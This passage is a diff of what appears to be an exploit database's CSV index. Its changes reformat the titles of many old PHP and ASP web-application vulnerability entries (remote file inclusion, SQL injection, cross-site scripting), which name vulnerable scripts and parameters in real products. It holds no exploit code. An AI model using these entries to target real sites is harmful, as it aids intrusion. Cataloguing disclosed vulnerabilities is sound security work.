-29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 - 'includes/themen_portal_mitte.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 -29729,platforms/php/webapps/29729.txt,"Premod SubDog 2 - 'includes/logger_engine.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 -29730,platforms/php/webapps/29730.txt,"SoftNews 4.1/5.5 - 'engine/init.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 -29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 - 'engine/Ajax/editnews.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - '/includes/functions_kb.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 - '/includes/themen_portal_mitte.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29729,platforms/php/webapps/29729.txt,"Premod SubDog 2 - '/includes/logger_engine.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29730,platforms/php/webapps/29730.txt,"SoftNews 4.1/5.5 - '/engine/init.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 +29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 - '/engine/Ajax/editnews.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80 29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0 29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0 @@ -31475,7 +31476,7 @@ id,file,description,date,author,platform,type,port 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0 29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0 29747,platforms/php/webapps/29747.txt,"DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting",2007-03-16,Mandr4ke,php,webapps,0 -29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - Enkrypt.php Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0 +29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0 29750,platforms/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps,0 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 29754,platforms/php/webapps/29754.html,"WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 @@ -31504,32 +31505,32 @@ id,file,description,date,author,platform,type,port 30157,platforms/php/webapps/30157.txt,"Joomla! Component JD-Wiki 1.0.2 - 'dwpage.php?MosConfig_absolute_path' Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30158,platforms/php/webapps/30158.txt,"Joomla! Component JD-Wiki 1.0.2 - 'wantedpages.php?MosConfig_absolute_path' Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30107,platforms/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps,0 -30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - search.php Cross-Site Scripting",2007-05-30,Serapis.net,php,webapps,0 +30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - 'search.php' Cross-Site Scripting",2007-05-30,Serapis.net,php,webapps,0 30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x - 'index.php' Multiple SQL Injections",2007-05-31,ls@calima.serapis.net,php,webapps,0 30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 - '(PHPJK) G_Display.php?iCategoryUnq' SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 -30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 - '(PHPJK) Search/DisplayResults.php?iSearchID' SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 -30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 - '(PHPJK) UserArea/Authenticate.php?sUName' Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 -30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 - '(PHPJK) UserArea/NewAccounts/index.php?sAccountUnq' Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 +30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 - '/(PHPJK) Search/DisplayResults.php?iSearchID' SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 +30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 - '/(PHPJK) UserArea/Authenticate.php?sUName' Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 +30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 - '/(PHPJK) UserArea/NewAccounts/index.php?sAccountUnq' Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps,0 30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 - '(PHPJK) G_Display.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-31,"laurent gaffie",php,webapps,0 -30118,platforms/php/webapps/30118.txt,"Prototype of an PHP Application 0.1 - 'gestion/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30119,platforms/php/webapps/30119.txt,"Prototype of an PHP Application 0.1 - 'ident/identification.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30120,platforms/php/webapps/30120.txt,"Prototype of an PHP Application 0.1 - 'ident/disconnect.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30121,platforms/php/webapps/30121.txt,"Prototype of an PHP Application 0.1 - 'ident/loginliste.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30122,platforms/php/webapps/30122.txt,"Prototype of an PHP Application 0.1 - 'ident/loginmodif.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30123,platforms/php/webapps/30123.txt,"Prototype of an PHP Application 0.1 - 'ident/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30124,platforms/php/webapps/30124.txt,"Prototype of an PHP Application 0.1 - 'ident/ident.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30125,platforms/php/webapps/30125.txt,"Prototype of an PHP Application 0.1 - 'menu/menuprincipal.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30126,platforms/php/webapps/30126.txt,"Prototype of an PHP Application 0.1 - 'Parameter/Parameter.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30127,platforms/php/webapps/30127.txt,"Prototype of an PHP Application 0.1 - 'plugins/PHPgacl/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30118,platforms/php/webapps/30118.txt,"Prototype of an PHP Application 0.1 - '/gestion/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30119,platforms/php/webapps/30119.txt,"Prototype of an PHP Application 0.1 - '/ident/identification.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30120,platforms/php/webapps/30120.txt,"Prototype of an PHP Application 0.1 - '/ident/disconnect.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30121,platforms/php/webapps/30121.txt,"Prototype of an PHP Application 0.1 - '/ident/loginliste.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30122,platforms/php/webapps/30122.txt,"Prototype of an PHP Application 0.1 - '/ident/loginmodif.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30123,platforms/php/webapps/30123.txt,"Prototype of an PHP Application 0.1 - '/ident/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30124,platforms/php/webapps/30124.txt,"Prototype of an PHP Application 0.1 - '/ident/ident.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30125,platforms/php/webapps/30125.txt,"Prototype of an PHP Application 0.1 - '/menu/menuprincipal.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30126,platforms/php/webapps/30126.txt,"Prototype of an PHP Application 0.1 - '/Parameter/Parameter.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 +30127,platforms/php/webapps/30127.txt,"Prototype of an PHP Application 0.1 - '/plugins/PHPgacl/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30128,platforms/php/webapps/30128.txt,"Prototype of an PHP Application 0.1 - 'index.php' path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30129,platforms/php/webapps/30129.txt,"Prototype of an PHP Application 0.1 - 'common.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30131,platforms/php/webapps/30131.txt,"Buttercup WFM - Title Parameter Cross-Site Scripting",2007-06-01,"John Martinelli",php,webapps,0 30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) - Cross-Site Scripting",2007-06-01,"Glafkos Charalambous",php,webapps,0 30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 - 'chat.php?sid' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 - 'help.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,php,webapps,0 -30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 - 'admin/header.php?admin[name]' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 -30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 - 'super/info.php?BASE_URL' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 -30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 - 'setup/footer.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,php,webapps,0 +30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 - '/admin/header.php?admin[name]' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 +30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 - '/super/info.php?BASE_URL' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps,0 +30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 - '/setup/footer.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,php,webapps,0 30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 - 'index.php' Cross-Site Scripting",2007-06-02,vagrant,php,webapps,0 30140,platforms/php/webapps/30140.txt,"Okyanusmedya - 'index.php' Cross-Site Scripting",2007-06-04,vagrant,php,webapps,0 30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 - Haberoku.asp SQL Injection",2007-06-04,ertuqrul,asp,webapps,0 @@ -31543,12 +31544,12 @@ id,file,description,date,author,platform,type,port 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous",php,webapps,0 30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - 'Okul Portal Haber_Oku.asp' SQL Injection",2007-06-08,ertuqrul,asp,webapps,0 30166,platforms/php/webapps/30166.txt,"WordPress 2.2 - 'Request_URI' Cross-Site Scripting",2007-06-08,zamolx3,php,webapps,0 -30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System - vBSupport.php SQL Injection",2007-06-09,rUnViRuS,php,webapps,0 +30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System - 'vBSupport.php' SQL Injection",2007-06-09,rUnViRuS,php,webapps,0 30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - 'auth.php' Multiple SQL Injections",2007-06-11,"Tim Brown",php,webapps,0 30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - 'auth.php?user' Cross-Site Scripting",2007-06-11,"Tim Brown",php,webapps,0 30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 - admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 - admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 -30175,platforms/php/webapps/30175.txt,"bbPress 0.8.1 - BB-login.php Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps,0 +30175,platforms/php/webapps/30175.txt,"bbPress 0.8.1 - 'BB-login.php' Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps,0 30177,platforms/php/webapps/30177.txt,"PlaySms 0.9.9.2 - Cross-Site Request Forgery",2013-12-10,"Saadi Siddiqui",php,webapps,0 30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 - comersus_message.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 30206,platforms/cfm/webapps/30206.txt,"FuseTalk 4.0 - forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter Cross-Site Scripting",2007-06-20,"Ivan Almuina",cfm,webapps,0 @@ -31574,7 +31575,7 @@ id,file,description,date,author,platform,type,port 29834,platforms/php/webapps/29834.txt,"WordPress Plugin dzs-videogallery - Arbitrary File Upload",2013-11-26,link_satisi,php,webapps,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 -29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - admin/index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 +29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - 'admin/index.php' Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29845,platforms/php/webapps/29845.txt,"PHPwebnews 0.1 - 'iklan.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0 @@ -31584,8 +31585,8 @@ id,file,description,date,author,platform,type,port 29849,platforms/php/webapps/29849.html,"ToendaCMS 1.5.3 - GET / POST Forms HTML Injection",2007-04-12,"Hanno Boeck",php,webapps,0 29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - Check_login.asp Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps,0 29852,platforms/php/webapps/29852.txt,"Doop Content Management System 1.3.x - Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,php,webapps,0 -29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - Img_Popup.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 -29855,platforms/php/webapps/29855.txt,"Flowers - Cas.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 +29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - 'Img_Popup.php' Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 +29855,platforms/php/webapps/29855.txt,"Flowers - 'Cas.php' Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0 29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0 29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 @@ -31598,20 +31599,20 @@ id,file,description,date,author,platform,type,port 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php?icodir' Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion",2007-04-20,Omni,php,webapps,0 -29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 - You.php Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps,0 -29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - 'contact/index.php?ripeformpost' SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 +29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 - 'You.php' Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps,0 +29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - '/contact/index.php?ripeformpost' SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusions",2007-04-23,InyeXion,php,webapps,0 -29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 +29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - 'article.php' SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29883,platforms/php/webapps/29883.txt,"ACVSWS - 'Transport.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29885,platforms/php/webapps/29885.txt,"Claroline 1.x - RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29886,platforms/php/webapps/29886.txt,"Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - 'admin.php?Groups Module group_id' Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 - 'admin.php?modsettings Module smiley_id' Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0 -29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - 'include/controlcenter/users.php' Multiple Method Privilege Escalations",2007-04-23,"Janek Vind",php,webapps,0 +29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - '/include/controlcenter/users.php' Multiple Method Privilege Escalations",2007-04-23,"Janek Vind",php,webapps,0 29890,platforms/php/webapps/29890.txt,"Phorum 5.1.20 - 'admin.php?module[]' Full Path Disclosure",2007-04-23,"Janek Vind",php,webapps,0 -29891,platforms/php/webapps/29891.txt,"Phorum 5.1.20 - 'include/admin/banlist.php?delete' Cross-Site Request Forgery Banlist Deletion",2007-04-23,"Janek Vind",php,webapps,0 +29891,platforms/php/webapps/29891.txt,"Phorum 5.1.20 - '/include/admin/banlist.php?delete' Cross-Site Request Forgery Banlist Deletion",2007-04-23,"Janek Vind",php,webapps,0 29892,platforms/php/webapps/29892.html,"Phorum 5.1.20 - pm.php Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 - admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 - admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 @@ -31640,11 +31641,11 @@ id,file,description,date,author,platform,type,port 29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - BRY.asp SQL Injection",2007-04-26,RMx,asp,webapps,0 29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal - Down_Indir.asp SQL Injection",2007-04-30,ertuqrul,asp,webapps,0 29935,platforms/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0 -29938,platforms/php/webapps/29938.txt,"E-Annu - home.php SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0 +29938,platforms/php/webapps/29938.txt,"E-Annu - 'home.php' SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0 29941,platforms/php/webapps/29941.txt,"CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0 29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0 29946,platforms/php/webapps/29946.txt,"Multiple WordPress Orange Themes - Cross-Site Request Forgery (Arbitrary File Upload)",2013-12-01,"Jje Incovers",php,webapps,0 -30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0 +30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - 'content.php' SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0 30198,platforms/asp/webapps/30198.txt,"TDizin - Arama.asp Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 30199,platforms/cgi/webapps/30199.txt,"WebIf - OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 @@ -31658,7 +31659,7 @@ id,file,description,date,author,platform,type,port 29961,platforms/php/webapps/29961.txt,"SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0 29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - index.pl Cross-Site Scripting",2007-05-07,ciri,cgi,webapps,0 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - 'index.php' Cross-Site Scripting",2007-05-07,Red_Casper,php,webapps,0 -29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 +29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - 'picture.php' Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 - 'Alias.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 - 'article.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 - 'ArticleAttachment.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 @@ -31691,8 +31692,8 @@ id,file,description,date,author,platform,type,port 29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 - 'UserType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30000,platforms/ios/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,ios,webapps,0 30002,platforms/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 -30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - 'implementation/Management/configuration.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - 'implementation/Management/db_connect.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - '/implementation/Management/configuration.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - '/implementation/Management/db_connect.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php?password' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 @@ -31705,25 +31706,25 @@ id,file,description,date,author,platform,type,port 30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 - Login Variable Cross-Site Scripting",2007-05-22,"Jesper Jurcenoks",php,webapps,0 30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",php,webapps,0 30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 - 'Parser_Path' Remote File Inclusion",2007-05-22,the_Edit0r,php,webapps,0 -30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 - ShowOwn.php Cross-Site Scripting",2007-05-22,CorryL,php,webapps,0 +30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 - 'ShowOwn.php' Cross-Site Scripting",2007-05-22,CorryL,php,webapps,0 30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - 'SQLEDIT.php' Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0 30076,platforms/php/webapps/30076.txt,"WYYS 1.0 - 'index.php' Cross-Site Scripting",2007-05-23,vagrant,php,webapps,0 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting",2007-05-23,"Marc Ruef",asp,webapps,0 30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 - 'rating.php' Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps,0 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 - 'news.asp' Cross-Site Scripting",2007-05-24,vagrant,php,webapps,0 -30082,platforms/php/webapps/30082.txt,"GNUTurk - Mods.php Cross-Site Scripting",2007-05-25,vagrant,php,webapps,0 +30082,platforms/php/webapps/30082.txt,"GNUTurk - 'Mods.php' Cross-Site Scripting",2007-05-25,vagrant,php,webapps,0 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 - (mod_notification) Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0 30084,platforms/php/webapps/30084.php,"WordPress Plugin page-flip-image-gallery - Arbitrary File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 30088,platforms/php/webapps/30088.txt,"Pligg CMS 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - 'news.php' SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 -30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php?selected_theme' Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 -30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Full Path Disclosures",2007-05-29,"Michal Majchrowicz",php,webapps,0 +30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - '/demo/pop3/error.php?selected_theme' Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 +30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - '/demo/pop3/error.php' Multiple Full Path Disclosures",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - 'manufacturer.php' SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 - config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 -30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 - Archives.php SQL 